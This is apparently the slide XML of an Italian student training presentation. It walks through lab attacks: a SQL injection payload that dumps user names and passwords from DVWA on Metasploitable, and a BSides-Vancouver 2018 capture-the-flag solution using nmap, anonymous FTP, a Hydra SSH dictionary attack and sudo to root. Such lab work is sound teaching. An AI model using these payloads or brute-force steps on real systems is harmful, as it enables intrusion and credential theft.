            <a:off x="9759995" y="6040868"/>
            <a:ext cx="3086100" cy="1060019"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="279182"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 5" id="5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="812800" cy="279182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="279182" w="812800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="812800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812800" y="279182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="279182"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="00BF63"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 6" id="6"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="812800" cy="260132"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="309129" y="319405"/>
            <a:ext cx="9191257" cy="95815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Per effettuare un attacco SQLi, dobbiamo collegarci alla DVWA della macchina vittima Metasploitable tramite il suo IP 192.168.13.100.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Collegati alla DVWA, impostato un livello di sicurezza LOW e verificato che il database sia vulnerabile, passiamo all’attacco.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Andiamo, quindi, a implementare il seguente script: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Implementato lo script, potremo interagire col database e avremo un risultato come quello in figura.</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3781592" cy="3824314"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18375456" cy="5099085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="66675"/>
              <a:ext cx="18375456" cy="3039816"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="8880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="8000" spc="-240">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>Giorno 5 Bonus- Hacking BSides-Vancouver 2018</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3790985"/>
              <a:ext cx="17384448" cy="1308100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3900"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>EFFETTUARE GLI ATTACCHI NECESSARI PER DIVENTARE ROOT IN UN AMBIENTE BLACK BOX</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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5289355" y="1047750"/>
            <a:ext cx="1969945" cy="336959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>BUILD WEEK </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475855" y="4191034"/>
            <a:ext cx="9519366" cy="2195878"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2195878" w="9519366">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9519366" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9519366" y="2195878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2195878"/>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5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="433611" y="2265103"/>
            <a:ext cx="7388003" cy="538099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A differenza delle prove precedenti, in questo caso non abbiamo alcuna informazione riguardo alla macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Apriamo una sessione di Ettercap per individuare l’IP della macchina BSides-Vancouver2018.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Il suo IP è 192.168.1.24</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885497" y="1427529"/>
            <a:ext cx="8813298" cy="4055828"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4055828" w="8813298">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8813298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8813298" y="4055829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4055829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8995659" y="6339047"/>
            <a:ext cx="8703137" cy="2019814"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2019814" w="8703137">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8703136" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8703136" y="2019814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2019814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>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6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="605350" y="303274"/>
            <a:ext cx="7388003" cy="95815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Effettuiamo subito uno scan dei servizi attivi sulla macchina vittima con “nmap”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Dai risultati, vediamo che ci sono 3 servizi attivi e che potrebbero essere sfruttati per attaccare la macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Proveremo ad hackerare la macchina inizialmente dalla porta 21, il servizio FTP, ma prima di tentare un hacking verifichiamo l’esistenza di eventuali credenziali di accesso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Tramite Hydra, vedremo che le credenziali sono “anonymous” e “yourpass”.</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433068" y="1157291"/>
            <a:ext cx="6826232" cy="2677815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2677815" w="6826232">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6826232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6826232" y="2677815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10433068" y="4083914"/>
            <a:ext cx="6826232" cy="5664060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5664060" w="6826232">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6826232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6826232" y="5664061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5664061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>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6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="227525" y="601218"/>
            <a:ext cx="9792341" cy="898144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Una volta iniziata la connessione col server, la prima risposta che ci offre è che lo stesso è solo anonimo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Quindi, possiamo accedere in forma anonima con lo username “anonymous”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Effettuato l’accesso, usiamo il comando “ls” per capire se all’interno di questo percorso abbiamo dei file o cartelle con cui interagire. Il più interessante è “public”, quindi ci spostiamo al suo interno col comando “cd”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Una volta all’interno della cartella, useremo nuovamente “ls” e troveremo un file di testo “users.txt.bk”. Lo scarichiamo col comando “get file_testo.txt”</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19789" y="1612198"/>
            <a:ext cx="2101390" cy="2558950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2558950" w="2101390">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2101390" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2101390" y="2558950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2558950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9763109" y="4479032"/>
            <a:ext cx="8262834" cy="1663160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1663160" w="8262834">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8262834" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8262834" y="1663160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1663160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9763109" y="7297806"/>
            <a:ext cx="8262834" cy="2248982"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2248982" w="8262834">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8262834" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8262834" y="2248982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2248982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>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7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="742740" y="2089579"/>
            <a:ext cx="8779084" cy="47809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Al suo interno, troveremo diversi username che possono essere una parte delle credenziali del servizio SSH.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Proviamo quindi un attacco a dizionario con Hydra, provando ogni username della lista accostandolo a una lista di password “rockyou.txt”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="742740" y="7231131"/>
            <a:ext cx="8401260" cy="23806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Alla fine, abbiamo trovato le credenziali che cercavamo per accedere al servizio SSH: “anne” è lo username, “princess” è la sua password.</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401608" y="1831660"/>
            <a:ext cx="8642496" cy="6856128"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6856128" w="8642496">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8642495" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642495" y="6856128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6856128"/>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="364916" y="319405"/>
            <a:ext cx="8779084" cy="95815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Trovate le credenziali, possiamo provare ad accedere al servizio SSH.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Avviamo il servizio col comando “ssh username@IP_macchina”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Prendiamo subito gli accessi da root col comando “sudo su” e ci spostiamo nella cartella /root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Al suo interno, useremo il comando “ls” e vedremo un file di testo “flag.txt”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Col comando “cat” potremo quindi leggere il file direttamente dal prompt: il file è quello che cercavamo, quindi abbiamo hackerato con successo la macchina.</a:t>
            </a:r>
          </a:p>
        </p:txBody>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1627308">
            <a:off x="-6906184" y="-1872346"/>
            <a:ext cx="17016201" cy="6180151"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6180151" w="17016201">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17016202" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17016202" y="6180152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="61801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029510" y="3711808"/>
            <a:ext cx="10709848" cy="1143979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="8880"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="-240">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>Grazie per l’attenzione!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-1627308">
            <a:off x="5445209" y="7487829"/>
            <a:ext cx="17016201" cy="6180151"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6180151" w="17016201">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17016201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17016201" y="6180152"/>
